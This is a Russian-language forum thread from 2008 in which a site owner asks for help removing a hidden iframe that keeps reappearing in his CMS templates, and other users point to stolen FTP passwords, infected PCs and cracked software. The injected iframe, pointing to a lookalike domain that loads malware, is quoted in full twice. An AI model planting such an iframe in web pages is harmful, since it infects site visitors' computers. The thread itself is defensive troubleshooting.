garnir 1 Опубликовано: 10 декабря 2008 Рассказать Опубликовано: 10 декабря 2008 (изменено) Наткнулся у сябя в индексе на левый код, который я туда не вписывал. <iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe> Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт. Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня. Подскажите как от этого избавиться? Сайт - xxxrips.ru Изменено 10 декабря 2008 пользователем garnir Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 10 декабря 2008 Рассказать Опубликовано: 10 декабря 2008 А причем здесь права на файл, взламывают ваш сайт по FTP, поэтому никакая смена прав на файл вам не поможет. Используйте поиск на форуме по слову iframe, эта тема неоднократно обсуждалась, там же и найдете пути для решения вопроса. Цитата Ссылка на сообщение Поделиться на других сайтах
leoxe 0 Опубликовано: 11 декабря 2008 Рассказать Опубликовано: 11 декабря 2008 Наткнулся у сябя в индексе на левый код, который я туда не вписывал. <iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe> Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт. Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня. Подскажите как от этого избавиться? Сайт - xxxrips.ru такая же проблема была, на днях, только код другой, но это не лавное... проверяешь винду антивирусом (а лучше переустанавливаешь), меняешь пароли на все! в т.ч. фтп, к панели хостера и т.п. и будет тебе счастье... Цитата Ссылка на сообщение Поделиться на других сайтах
serega7777777 0 Опубликовано: 12 декабря 2008 Рассказать Опубликовано: 12 декабря 2008 Поискал в нете инфу что это за фигна - оказалось что эта муть грузит вирусы на комп пользователя, зашедшего на сайт. Вычистил код, сменил права на индекс (поставл всем только чтение), на следующий день опять такая-же фигня. Подскажите как от этого избавиться? Сайт - xxxrips.ru Уважаемый Виктор, почему вам не забанить этого подлеца с его порнушным сайтом и с трояном ? Цитата Ссылка на сообщение Поделиться на других сайтах
garnir 1 Опубликовано: 23 декабря 2008 Рассказать Опубликовано: 23 декабря 2008 (изменено) Автор Какой у меня сайт - это мое личное дело. Не нравится - не ходите. Речь идет о движке и вирусе, который, между прочим, достал уже всех. Я снес винду на своем компе, поставил вместо нее Debian Linux, поменял ВСЕ пароли, ftp, админка, свой пароль входа на сайт и всеравно ничего не помогает. Этот код продолжает появляться. Изменено 23 декабря 2008 пользователем garnir Цитата Ссылка на сообщение Поделиться на других сайтах
Demon2 0 Опубликовано: 23 декабря 2008 Рассказать Опубликовано: 23 декабря 2008 А может движок нуленый с сюрпризом? Цитата Ссылка на сообщение Поделиться на других сайтах
garnir 1 Опубликовано: 24 декабря 2008 Рассказать Опубликовано: 24 декабря 2008 Автор Вот это не надо на меня вешать. Движок я покупал. И в отличии от засранцев, которые юзают нуленые движки я имею право хоть на какую-то поддержку, хотя-бы на форуме. PS Только дебил станет обращаться на официальный форум поддержки с пиратской версией скрипта. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 24 декабря 2008 Рассказать Опубликовано: 24 декабря 2008 garnir, Всем чем я мог, я вам помог, я объяснил вам, что не в скрипте не проблема, взламывают вас не через скрипт. У вас утекают ваши логины и пароли, причем не от скрипта, а выше, т.к. изменить через web index.php нельзя, на файл нет прав на запись. Меняют по FTP или SSH, или с панели управления хостингом. Возможно уязвимо ПО хостинга, такие случаи также были не раз. Цитата Ссылка на сообщение Поделиться на других сайтах
garnir 1 Опубликовано: 25 декабря 2008 Рассказать Опубликовано: 25 декабря 2008 Автор Сегодня обнаружил новую штуку. Перестал появляться айфрейм в шаблоне main и в index, но код появляется в коротких новостях, причем не во всех. Где теперь его искать - ума не приложу. Пересмотрел все шаблоны. Ничего не нашел. !!!! Во дела! Нашел код в рекламных материалах! Цитата Ссылка на сообщение Поделиться на других сайтах
Zdraff 4 Опубликовано: 26 декабря 2008 Рассказать Опубликовано: 26 декабря 2008 Блин. 1. убедись, что ОСь у тебя здоровая на компе. 2. убедись, что хостер следит за чистотой сервера. 3. скачай шароварный фтп-клиент и не крякай его (или купи лицензию). 4. поменяй пасс на фтп. 5. юзай и анализируй. Цитата Ссылка на сообщение Поделиться на других сайтах
Rudnizki 0 Опубликовано: 4 января 2009 Рассказать Опубликовано: 4 января 2009 Стукни в асю, постараюсь помоч Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.